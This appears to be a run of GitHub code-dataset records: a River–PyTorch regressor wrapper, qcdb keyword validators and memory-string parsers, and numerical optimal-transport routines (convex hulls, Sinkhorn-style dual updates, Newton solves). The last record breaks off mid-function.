self.optimizer.step()\n self._batch_i = 0\n\n return self\n\n\nclass PyTorch2RiverRegressor(PyTorch2RiverBase, base.Regressor):\n \"\"\"Compatibility layer from PyTorch to River for regression.\n\n Parameters\n ----------\n net\n loss_fn\n optimizer\n batch_size\n\n Examples\n --------\n\n >>> from river import compat\n >>> from river import datasets\n >>> from river import evaluate\n >>> from river import metrics\n >>> from river import preprocessing\n >>> import torch\n >>> from torch import nn\n >>> from torch import optim\n\n >>> _ = torch.manual_seed(0)\n\n >>> dataset = datasets.TrumpApproval()\n\n >>> n_features = 6\n >>> net = nn.Sequential(\n ... nn.Linear(n_features, 3),\n ... nn.Linear(3, 1)\n ... )\n\n >>> model = (\n ... preprocessing.StandardScaler() |\n ... compat.PyTorch2RiverRegressor(\n ... net=net,\n ... loss_fn=nn.MSELoss(),\n ... optimizer=optim.SGD(net.parameters(), lr=1e-3),\n ... batch_size=2\n ... )\n ... )\n >>> metric = metrics.MAE()\n\n >>> evaluate.progressive_val_score(dataset, model, metric).get()\n 2.78258\n\n \"\"\"\n\n def __init__(\n self,\n net: torch.nn.Sequential,\n loss_fn: torch.nn.modules.loss._Loss,\n optimizer: torch.optim.Optimizer,\n batch_size=1,\n ):\n super().__init__(\n net=net,\n loss_fn=loss_fn,\n optimizer=optimizer,\n batch_size=batch_size,\n x_tensor=torch.Tensor,\n y_tensor=torch.Tensor,\n )\n\n def predict_one(self, x):\n x = self.x_tensor(list(x.values()))\n return self.net(x).item()\n","repo_name":"Bantey17/river","sub_path":"river/compat/pytorch.py","file_name":"pytorch.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"70251791844","text":"import re\n\nfrom ..exceptions import KeywordValidationError\n\n\ndef enum(inputval):\n allowed = inputval.upper().split()\n\n def closedenum(x, allowed=allowed):\n if x.upper() in allowed:\n return x.upper()\n else:\n raise KeywordValidationError(\"\"\"Not allowed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef enum_bool(inputval):\n allowed = inputval.upper().split()\n\n def closedenum(x, allowed=allowed):\n if x.upper() in allowed:\n if x.upper() == \"TRUE\":\n return \"ON\"\n elif x.upper() == \"FALSE\":\n return \"OFF\"\n else:\n return x.upper()\n else:\n raise KeywordValidationError(\"\"\"Not allowed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef onoff_boolean(inputval):\n yes = re.compile(r\"^(yes|true|on|1)\", re.IGNORECASE)\n no = re.compile(r\"^(no|false|off|0)\", re.IGNORECASE)\n\n if yes.match(str(inputval)):\n return \"on\"\n elif no.match(str(inputval)):\n return \"off\"\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into boolean: {}\"\"\".format(inputval))\n\n\ndef intenum(inputval, nullable=False):\n allowed = [int(x) for x in inputval.split()]\n if nullable:\n allowed.append(None)\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed integer value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef mixedenum(inputval, nullable=False):\n allowed = []\n for x in inputval.split():\n try:\n val = int(x)\n except ValueError:\n val = x\n\n allowed.append(val)\n\n if nullable:\n allowed.append(None)\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed mixed value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef casesensitive_enum(inputval):\n allowed = inputval.split()\n\n def closedenum(x, allowed=allowed):\n if x in allowed:\n return x\n else:\n raise KeywordValidationError(\"\"\"Not allowed case-sensitive value: {} not in {}\"\"\".format(inputval, allowed))\n\n return closedenum\n\n\ndef boolean(inputval):\n yes = re.compile(r\"^(yes|true|on|1)\", re.IGNORECASE)\n no = re.compile(r\"^(no|false|off|0)\", re.IGNORECASE)\n\n if yes.match(str(inputval)):\n return True\n elif no.match(str(inputval)):\n return False\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into boolean: {}\"\"\".format(inputval))\n\n\ndef sphcart(inputval):\n sph = re.compile(r\"^(yes|true|on|1|sph|spherical)\", re.IGNORECASE)\n cart = re.compile(r\"^(no|false|off|0|cart|cartesian)\", re.IGNORECASE)\n\n if sph.match(str(inputval)):\n return True\n elif cart.match(str(inputval)):\n return False\n else:\n raise KeywordValidationError(\"\"\"Can't interpret into boolean True (sph) or False (cart): {}\"\"\".format(inputval))\n\n\ndef gridradang(inputval):\n\n if isinstance(inputval, dict):\n retdict = {}\n for k, v in inputval.items():\n rad, ang = v\n retdict[k] = (positive_integer(rad), positive_integer(ang))\n return dict(sorted(retdict.items())) # to place '' key first\n else:\n rad, ang = inputval\n return {\"\": (positive_integer(rad), positive_integer(ang))}\n\n\ndef bool_or_elem_dict(inputval):\n if isinstance(inputval, dict):\n retdict = {k.capitalize(): positive_integer(v) for k, v in inputval.items()}\n return dict(sorted(retdict.items()))\n else:\n return boolean(inputval)\n\n\ndef atompair(inputval):\n\n if isinstance(inputval, dict):\n retdict = {}\n for k, v in inputval.items():\n atom1, atom2 = v\n retdict[k] = (positive_integer(atom1), positive_integer(atom2))\n return dict(sorted(retdict.items())) # to place '' key first\n else:\n return {\"\"}\n\n\ndef percentage(inputval):\n if 0.0 <= inputval <= 100.0:\n return float(inputval)\n else:\n raise KeywordValidationError(\"Percentage should be between 0 and 100: {}\".format(inputval))\n\n\ndef nonnegative_float(inputval):\n if 0.0 <= inputval:\n return float(inputval)\n else:\n raise KeywordValidationError(\"Float should be non-negative: {}\".format(inputval))\n\n\ndef positive_integer(inputval):\n if inputval > 0 and float(inputval).is_integer():\n return int(inputval)\n else:\n raise KeywordValidationError(\"Positive integer, if you please: {}\".format(inputval))\n\n\ndef nonnegative_integer(inputval):\n if inputval > -1 and float(inputval).is_integer():\n return int(inputval)\n else:\n raise KeywordValidationError(\"Non-negative integer number, if you please: {}\".format(inputval))\n\n\ndef integer(inputval):\n if float(inputval).is_integer():\n return int(inputval)\n else:\n raise KeywordValidationError(\"Integer number, if you please: {}\".format(inputval))\n\n\ndef parse_convergence(inputval):\n\n if inputval > 0 and isinstance(inputval, int):\n return pow(10.0, -inputval)\n elif inputval > 0 and inputval < 5:\n return inputval\n else:\n raise KeywordValidationError(\"wth! you call this a convergence criterion? {}\".format(inputval))\n\n\ndef parse_memory(inputval, min_mem_allowed=262144000):\n \"\"\"Validates expression for total memory allocation. Takes memory value\n `inputval` as type int, float, or str; int and float are taken literally\n as bytes to be set, string taken as a unit-containing value (e.g., 30 mb)\n which is case-insensitive.\n\n :returns: *memory_amount* (float) Number of bytes of memory\n\n :raises: ValidationError when <500MiB or disallowed type or misformatted\n\n :examples:\n\n >>> # [1] Passing absolute number of bytes\n >>> psi4.set_memory(600000000)\n >>> psi4.get_memory()\n Out[1]: 600000000L\n\n >>> # [2] Passing memory value as string with units\n >>> psi4.set_memory('30 GB')\n >>> psi4.get_memory()\n Out[2]: 30000000000L\n\n >>> # Good examples\n >>> psi4.set_memory(800000000) # 800000000\n >>> psi4.set_memory(2004088624.9) # 2004088624\n >>> psi4.set_memory(1.0e9) # 1000000000\n >>> psi4.set_memory('600 mb') # 600000000\n >>> psi4.set_memory('600.0 MiB') # 629145600\n >>> psi4.set_memory('.6 Gb') # 600000000\n >>> psi4.set_memory(' 100000000kB ') # 100000000000\n >>> psi4.set_memory('2 eb') # 2000000000000000000\n\n >>> # Bad examples\n >>> psi4.set_memory({}) # odd type\n >>> psi4.set_memory('') # no info\n >>> psi4.set_memory(\"8 dimms\") # unacceptable units\n >>> psi4.set_memory(\"1e5 gb\") # string w/ exponent\n >>> psi4.set_memory(\"5e5\") # string w/o units\n >>> psi4.set_memory(2000) # mem too small\n >>> psi4.set_memory(-5e5) # negative (and too small)\n\n \"\"\"\n # Handle memory given in bytes directly (int or float)\n if isinstance(inputval, (int, float)):\n val = inputval\n units = \"\"\n # Handle memory given as a string\n elif isinstance(inputval, str):\n memory_string = re.compile(r\"^\\s*(\\d*\\.?\\d+)\\s*([KMGTPBE]i?B)\\s*$\", re.IGNORECASE)\n matchobj = re.search(memory_string, inputval)\n if matchobj:\n val = float(matchobj.group(1))\n units = matchobj.group(2)\n else:\n raise KeywordValidationError(\n \"\"\"Invalid memory specification: {}. Try 5e9 or '5 gb'.\"\"\".format(repr(inputval))\n )\n else:\n raise KeywordValidationError(\n \"\"\"Invalid type {} in memory specification: {}. Try 5e9 or '5 gb'.\"\"\".format(type(inputval), repr(inputval))\n )\n\n # Units decimal or binary?\n multiplier = 1000\n if \"i\" in units.lower():\n multiplier = 1024\n units = units.lower().replace(\"i\", \"\").upper()\n\n # Build conversion factor, convert units\n unit_list = [\"\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\"]\n mult = 1\n for unit in unit_list:\n if units.upper() == unit:\n break\n mult *= multiplier\n\n memory_amount = int(val * mult)\n\n # Check minimum memory requirement\n if memory_amount < min_mem_allowed:\n raise KeywordValidationError(\n \"\"\"set_memory(): Requested {:.3} MiB ({:.3} MB); minimum 250 MiB (263 MB). Please, sir, I want some more.\"\"\".format(\n memory_amount / 1024 ** 2, memory_amount / 1000 ** 2\n )\n )\n\n return memory_amount\n\n\ndef parse_memory_nomin(inputval):\n return parse_memory(inputval, min_mem_allowed=0)\n","repo_name":"qcdb/qcdb","sub_path":"qcdb/keywords/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":8756,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"35023769006","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 24 16:09:00 2014\r\n\r\n@author: hdemarch\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport timeit\r\nimport math\r\nfrom multiprocessing import Pool\r\n\r\nimport Generic_Functions as gf\r\n \r\n\r\n\r\n\r\ndef loc_convex_hull(x_0, func, grid, plot = False, \r\n zero = 1e-10, hidden_contact = False,\r\n debug_mode = False, param_hidden = 1e-10,\r\n gradient_guess = None):\r\n d = len(x_0)\r\n contact = np.array([])\r\n argcontact = np.array([])\r\n shift = -np.copy(func)\r\n bary_coeffs = [-1.]\r\n infty = 1/zero\r\n if gradient_guess is None:\r\n gradient = np.zeros(d)\r\n else:\r\n gradient = gradient_guess\r\n elem_scalar = grid*gradient\r\n scalar_product =np.sum(elem_scalar, axis=1)\r\n shift += scalar_product\r\n if plot:\r\n fig_num=0\r\n please_break = False\r\n while gf.approx_Negative(bary_coeffs):\r\n if (len(contact)==d+1 or please_break):\r\n argneg=np.argmin(bary_coeffs)\r\n contact = np.delete(contact,argneg,0)\r\n argcontact = np.delete(argcontact,argneg,0)\r\n please_break = False\r\n if len(contact)>0:\r\n p=gf.projection(x_0,np.copy(contact))\r\n if gf.approx_Equal(p,x_0):\r\n bary_DATA =gf.barycenter(x_0,contact,argcontact)\r\n bary_coeffs = bary_DATA['coeffs']\r\n contact = bary_DATA[\"vectors\"]\r\n argcontact = bary_DATA[\"argvectors\"]\r\n please_break = True\r\n if plot:\r\n gf.print_dots(x_0,contact,fig_num)\r\n fig_num = fig_num+1\r\n else:\r\n diff = x_0-p\r\n u=diff/np.linalg.norm(diff)\r\n elem_scalar = grid-p\r\n elem_scalar *=u\r\n scalar_product =np.sum(elem_scalar, axis=1)\r\n scalar_product_plus = np.maximum(scalar_product,zero)\r\n prohibition = np.maximum(np.minimum(2*zero-scalar_product_plus,zero),0)\r\n prohibition *= infty**2\r\n quotient = shift/scalar_product_plus\r\n quotient += prohibition\r\n elif len(contact)==0:\r\n quotient = shift\r\n u=0*x_0\r\n p=0*x_0\r\n if not please_break:\r\n argument = np.argmin(quotient)\r\n if debug_mode:\r\n print(\"x_0\",x_0)\r\n print(\"shift before\",shift)\r\n for quo in quotient:\r\n print(\"quotient\",quo)\r\n print(\"argument\",argument)\r\n for con in contact:\r\n print(\"contact = \",con)\r\n print(\"quotient[argument]before\", quotient[argument])\r\n quot_min = quotient[argument]\r\n if len(contact)>0:\r\n shift -= quot_min*scalar_product\r\n gradient -= quot_min*u\r\n else:\r\n shift -= quot_min\r\n if debug_mode:\r\n print(\"quotient[argument]\", quot_min)\r\n if debug_mode:\r\n print(\"shift after\",shift) \r\n xmin=grid[argument]\r\n if len(contact)==0:\r\n contact = np.array([xmin])\r\n else:\r\n contact = np.append(contact,[xmin],axis = 0)\r\n argcontact = np.append(argcontact,argument)\r\n if len(contact)==d+1:\r\n bary_DATA =gf.barycenter(x_0,contact,argcontact)\r\n bary_coeffs = bary_DATA['coeffs']\r\n contact = bary_DATA[\"vectors\"]\r\n if plot:\r\n gf.print_dots(x_0,contact,fig_num)\r\n fig_num = fig_num+1\r\n argcontact = bary_DATA[\"argvectors\"]\r\n nb_contacts = len(contact)\r\n values = np.zeros(nb_contacts)\r\n for i in range(nb_contacts):\r\n values[i] = func[int(argcontact[i])]\r\n value = np.dot(bary_coeffs,values)\r\n total_contact = list(contact)\r\n total_argcontact = list(argcontact)\r\n if hidden_contact:\r\n for index in argcontact:\r\n shift[int(index)] += infty\r\n argmin = np.argmin(shift)\r\n while shift[argmin] < param_hidden:\r\n total_contact.append(grid[int(argmin)])\r\n total_argcontact.append(argmin)\r\n shift[argmin] += infty\r\n argmin = np.argmin(shift)\r\n return {'value':value , 'contact' : contact , 'argcontact' : argcontact,\r\n 'coeffs' : bary_coeffs , 'total_contact' : total_contact,\r\n 'total_argcontact' : total_argcontact , 'gradient' : gradient }\r\n\r\n\r\n\r\n\r\n\r\ndef Gradient_stochastique(psi_0, grid, cost,\r\n tolerance = 1e-4, nbpas=40000, epsilon = 0):\r\n mu_0 = grid.mu\r\n nu_0 = grid.nu\r\n psi = np.copy(psi_0)\r\n for n in range(nbpas):\r\n grad = epsilon*psi\r\n rand = np.random.rand(2)\r\n prob_cumul_x = 0\r\n prob_cumul_y = 0\r\n for i in range(len(grid.grid)):\r\n prob_cumul_x = prob_cumul_x+mu_0[i]\r\n if prob_cumul_x>=rand[0]:\r\n index_x = i\r\n break\r\n for i in range(len(grid.grid)):\r\n prob_cumul_y = prob_cumul_y+nu_0[i]\r\n if prob_cumul_y>=rand[0]:\r\n index_y = i\r\n break\r\n gamma = 1./(n+1)**(0.6)\r\n x_0=grid.grid[index_x]\r\n func = grid.func_grid(lambda y: cost(x_0,y))\r\n func -= psi\r\n DATA_convexhull=loc_convex_hull(x_0,func,grid)\r\n arguments = DATA_convexhull['argcontact']\r\n Coeff_bary = DATA_convexhull['coeffs']\r\n for j in range(len(arguments)):\r\n arg = int(arguments[j])\r\n grad[arg]= grad[arg]-Coeff_bary[j]*mu_0[arg]\r\n grad[index_y]=grad[index_y]-1\r\n psi = psi - gamma*grad\r\n if n % 40 == 0:\r\n print(n)\r\n return {'x': psi}\r\n\r\n\r\ndef auxiliary_phi(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX[i],gridY)\r\n if martingale:\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(h[i],(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-psi)/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n if mu[i] == 0.:\r\n logmu_i = -infty\r\n print(\"mu equals zero at x=\"+str(gridX[i]))\r\n else:\r\n logmu_i = np.log(mu[i])\r\n phi_i = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n return {'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i}\r\n\r\n\r\ndef auxiliary_psi(j, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n phi = arg['phi']\r\n h = arg['h']\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n nu = arg['nu']\r\n infty = arg['infty']\r\n martingale = arg['martingale']\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(gridX,gridY[j])\r\n if martingale:\r\n Y_X = np.reshape(gridY[j],(1,dim))-gridX\r\n arg_Gibbs = (cost_array-phi-np.sum(h*Y_X, axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-phi)/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n if nu[j] == 0.:\r\n lognu_j = -infty\r\n print(\"nu equals zero at y=\"+str(gridY[j]))\r\n else:\r\n lognu_j = np.log(nu[j])\r\n psi_j = -epsilon*(lognu_j- (np.log(Gibbs)+maximum) )\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n return {'j' : j , 'time_comp' : time_comp, 'psi_j' : psi_j}\r\n\r\n\r\ndef auxiliary_h(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n lenY = arg['lenY']\r\n hi_0 = arg['h'][i]\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n minimize = arg['minimize']\r\n nmax_Newton_h = arg['nmax_Newton_h']\r\n calc_phi = arg['calc_phi']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n zero = arg['zero']\r\n lenX = arg['lenX']\r\n debug_mode = arg['debug_mode']\r\n newNewton = arg['newNewton']\r\n pow_distance = arg['pow_distance']\r\n tol_Newton_h = arg['tol_Newton_h']\r\n precise_h = arg['precise_h']\r\n safe_solving = arg['safe_solving']\r\n if safe_solving:\r\n hardcore_compute = arg['restrict_compute'][i] \r\n previous_error = arg['previous_error'][i] \r\n iter_fail = arg['iter_fail']\r\n else:\r\n hardcore_compute = False\r\n \r\n t_0 = timeit.default_timer()\r\n if precise_h:\r\n tol_Newton_h *= min(1., epsilon)\r\n cost_array = cost(gridX[i],gridY)\r\n Y_X = gridY-np.reshape(gridX[i],(1,dim))\r\n \r\n if calc_phi:#???\r\n mu_i = max(mu[i], zero/lenX)\r\n if mu[i] == 0.:\r\n logmu_i = -infty\r\n else:\r\n logmu_i = np.log(mu[i])\r\n DATA = {'phi_i' : None, 'hi' : None, 'gradient' : None,\r\n 'result_found' : False, 'result_opt' : None}\r\n def phi_from_h(hi):\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_i_loc = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n return phi_i_loc\r\n else:\r\n arg_Gibbs_0 = (cost_array-psi-np.sum(np.reshape(hi_0,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n arg_Gibbs_0 -= np.max(arg_Gibbs_0)\r\n Gibbs_0 = np.exp(arg_Gibbs_0)\r\n Z_0 = np.sum(Gibbs_0)\r\n \r\n def value_h(hi):\r\n if DATA['result_found']:\r\n return (0, 0*hi)\r\n if calc_phi:\r\n DATA['hi'] = hi\r\n DATA['phi_i'] = phi_from_h(hi)\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if debug_mode == 4:\r\n gf.check(gf.approx_Equal(np.sum(Gibbs),\r\n mu[i]), (np.sum(Gibbs), mu[i]))\r\n value = (epsilon+phi_i)*mu_i\r\n if debug_mode == 4:\r\n gf.check(np.sum(Gibbs), mu_i)\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X, axis = 0)\r\n DATA['gradient'] = gradient\r\n else:\r\n arg_Gibbs = arg_Gibbs_0 -np.sum(np.reshape(hi,(1,dim))*Y_X, axis = 1)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)/Z_0\r\n value = epsilon*np.sum(Gibbs)\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X, axis = 0)\r\n if not newNewton:\r\n if np.linalg.norm(gradient, 1) <= tol_Newton_h:\r\n DATA['result_found'] = True\r\n DATA['result_opt'] = hi\r\n if debug_mode == 5:\r\n print(\"result found.\")\r\n val = value/mu_i\r\n grad = gradient/mu_i\r\n return (val, grad)\r\n def hessian_h(hi):\r\n if calc_phi:\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n hessian = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(Y_X,\r\n (lenY,dim,1))*np.reshape(Y_X,\r\n (lenY,1,dim)), axis = 0)\r\n if gf.approx_Equal(DATA['hi'], hi, tolerance = tol_Newton_h):\r\n gradient = DATA['gradient']\r\n else:\r\n gradient = value_h(hi)[1]\r\n hessian -= 1/epsilon*1/mu_i*np.reshape(gradient,\r\n (dim, 1))*np.reshape(gradient,(1, dim))\r\n else:\r\n arg_Gibbs = arg_Gibbs_0 -np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1)/epsilon\r\n Gibbs = np.exp(arg_Gibbs)/Z_0\r\n hessian = 1/epsilon*np.sum(np.reshape(Gibbs,\r\n (lenY,1,1))*np.reshape(Y_X,\r\n (lenY,dim,1))*np.reshape(Y_X,\r\n (lenY,1,dim)),axis = 0)\r\n return hessian/mu_i\r\n \r\n x0 = hi_0\r\n if debug_mode == 5:\r\n disp = True\r\n else:\r\n disp = False\r\n if not hardcore_compute:\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon)\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n elif hardcore_compute:\r\n epsilon_sto = epsilon\r\n epsilon_end = epsilon\r\n norm_psi = np.linalg.norm(psi, np.inf)\r\n size_Delta = norm_psi+1.\r\n epsilon_start = min(size_Delta/10., previous_error)*2**iter_fail\r\n if epsilon_start < previous_error*2**iter_fail:\r\n norm_x0 = np.linalg.norm(x0, 1)\r\n x0 /= max(norm_x0/(10.*size_Delta), 1.)\r\n if epsilon_end < epsilon_start:\r\n nb_iter = int(2+np.rint(-np.log2(epsilon_end/epsilon_start)))\r\n d_eps = (epsilon_end/epsilon_start)**(1./(nb_iter-1.))\r\n else:\r\n nb_iter = int(2+np.rint(np.log2(epsilon_end/epsilon_start)))\r\n d_eps = (epsilon_end/epsilon_start)**(1./(nb_iter-1.))\r\n for step in range(nb_iter):\r\n epsilon = epsilon_start*d_eps**step\r\n if newNewton:\r\n result = gf.Newton(value_h, hessian_h, x0 = x0, tol = tol_Newton_h,\r\n maxiter= nmax_Newton_h, disp= disp,\r\n pow_distance = pow_distance,\r\n order_hess = 1./epsilon)\r\n x0 = result['x']\r\n else:\r\n result = minimize(value_h, x0 = x0,\r\n method='Newton-CG',\r\n jac=True, hess = hessian_h,\r\n tol=tol_Newton_h,\r\n options={'maxiter': nmax_Newton_h,\r\n 'xtol' : tol_Newton_h,\r\n 'disp' : disp})\r\n if calc_phi:\r\n if newNewton:\r\n x0 = result['x']\r\n elif DATA['result_found']:\r\n x0 = DATA['result_opt']\r\n else:\r\n x0 = result.x\r\n\r\n epsilon = epsilon_sto\r\n \r\n time_comp = timeit.default_timer()-t_0\r\n if calc_phi:\r\n if newNewton:\r\n hi = result['x']\r\n elif DATA['result_found']:\r\n hi = DATA['result_opt']\r\n else:\r\n hi = result.x\r\n if gf.approx_Equal(hi, DATA['hi'], tolerance = zero**2):\r\n phi_i = DATA['phi_i']\r\n else:\r\n phi_i = phi_from_h(hi)\r\n\r\n else:\r\n phi_i = None\r\n if newNewton:\r\n hi += result['x']\r\n elif DATA['result_found']:\r\n hi += DATA['result_opt']\r\n else:\r\n hi += result.x\r\n if debug_mode == 5:\r\n print(\"grad norm wololo\", np.linalg.norm(DATA['gradient']))\r\n return {'hi' : hi , 'i' : i , 'time_comp' : time_comp, 'phi_i' : phi_i,\r\n 'gradient' : DATA['gradient']/mu_i}\r\n\r\n\r\n\r\ndef auxiliary_h_index(i, arg):\r\n gridY = arg['gridY']\r\n cost_raw = arg['cost']\r\n min_cost = arg['min_cost']\r\n max_cost = arg['max_cost']\r\n def cost(x, y):\r\n cost_computed = cost_raw(x, y)\r\n if min_cost == max_cost:\r\n return 0.*cost_computed\r\n else:\r\n return (cost_computed+min_cost)/(max_cost-min_cost)\r\n psi = arg['psi']\r\n lenY = arg['lenY']\r\n hi_0 = arg['h'][i]\r\n epsilon = arg['epsilon']\r\n gridX = arg['gridX']\r\n dim = arg['dim']\r\n minimize = arg['minimize']\r\n nmax_Newton_h = arg['nmax_Newton_h']\r\n calc_phi = arg['calc_phi']\r\n mu = arg['mu']\r\n infty = arg['infty']\r\n zero = arg['zero']\r\n lenX = arg['lenX']\r\n debug_mode = arg['debug_mode']\r\n newNewton = arg['newNewton']\r\n pow_distance = arg['pow_distance']\r\n tol_Newton_h = arg['tol_Newton_h']\r\n index = arg['index']\r\n pen_h = 0.#1e-10#???\r\n \r\n hi_index_0 = hi_0[index]\r\n x_i = gridX[i]\r\n \r\n t_0 = timeit.default_timer()\r\n cost_array = cost(x_i, gridY)\r\n DATA = {'phi_i' : None, 'gradient' : None, 'hi': hi_0, 'hi_index' : None,\r\n 'result_found' : False, 'result_opt' : None}\r\n mu_i = max(mu[i], zero/lenX)\r\n if mu[i] == 0.:\r\n logmu_i = -infty\r\n else:\r\n logmu_i = np.log(mu[i])\r\n if calc_phi:\r\n Y_X = gridY-np.reshape(x_i,(1,dim))\r\n Y_X_index = np.reshape(Y_X[:, index], (lenY, 1))\r\n def phi_from_h(hi):\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi,(1,dim))*Y_X,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_i_loc = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n return phi_i_loc\r\n\r\n else:\r\n arg_Gibbs = (cost_array-psi-np.sum(np.reshape(hi_0,(1,dim))*gridY,\r\n axis = 1))/epsilon\r\n maximum = np.max(arg_Gibbs)\r\n arg_Gibbs -= maximum\r\n Gibbs = np.sum(np.exp(arg_Gibbs))\r\n phi_h_x = -epsilon*(logmu_i- (np.log(Gibbs)+maximum) )\r\n gridY_index = np.reshape(gridY[:, index], (lenY, 1))\r\n x_i_index = x_i[index]\r\n \r\n def value_h(hi_index):\r\n if DATA['result_found']:\r\n return (0, 0*hi_index)\r\n DATA['hi'][index] = hi_index[0]\r\n hi = DATA['hi']\r\n DATA['hi_index'] = hi_index\r\n if calc_phi:\r\n DATA['phi_i'] = phi_from_h(hi)\r\n phi_i = DATA['phi_i']\r\n arg_Gibbs = (cost_array-psi-phi_i-np.sum(np.reshape(hi, (1, dim))*Y_X,\r\n axis = 1))/epsilon\r\n else:\r\n arg_Gibbs = (cost_array-psi-phi_h_x-np.sum(np.reshape(hi, (1, dim))*gridY,\r\n axis = 1))/epsilon\r\n Gibbs = np.exp(arg_Gibbs)\r\n if debug_mode == 4 and calc_phi:\r\n gf.check(gf.approx_Equal(np.sum(Gibbs),\r\n mu[i]), (np.sum(Gibbs), mu[i]))\r\n if calc_phi:\r\n value = (epsilon+phi_i)*mu_i\r\n gradient = -np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*Y_X_index, axis = 0)\r\n else:\r\n value = mu_i*(phi_h_x+np.dot(hi, x_i))+epsilon*np.sum(Gibbs)\r\n gradient = mu_i*x_i_index-np.sum(np.reshape(Gibbs,\r\n (lenY, 1))*gridY_index, axis = 0)\r\n DATA['gradient'] = gradient\r\n if not newNewton:\r\n if np.linalg.norm(gradient, 1) <= tol_Newton_h:\r\n DATA['result_found'] = True\r\n DATA['result_opt'] = hi_index\r\n if debug_mode == 5:\r\n print(\"result found.\")\r\n val = value/mu_i\r\n grad = gradient/mu_i\r\n val += pen_h*0.5*np.dot(hi_index, hi_index)\r\n grad += pen_h*hi_index\r\n return (val, 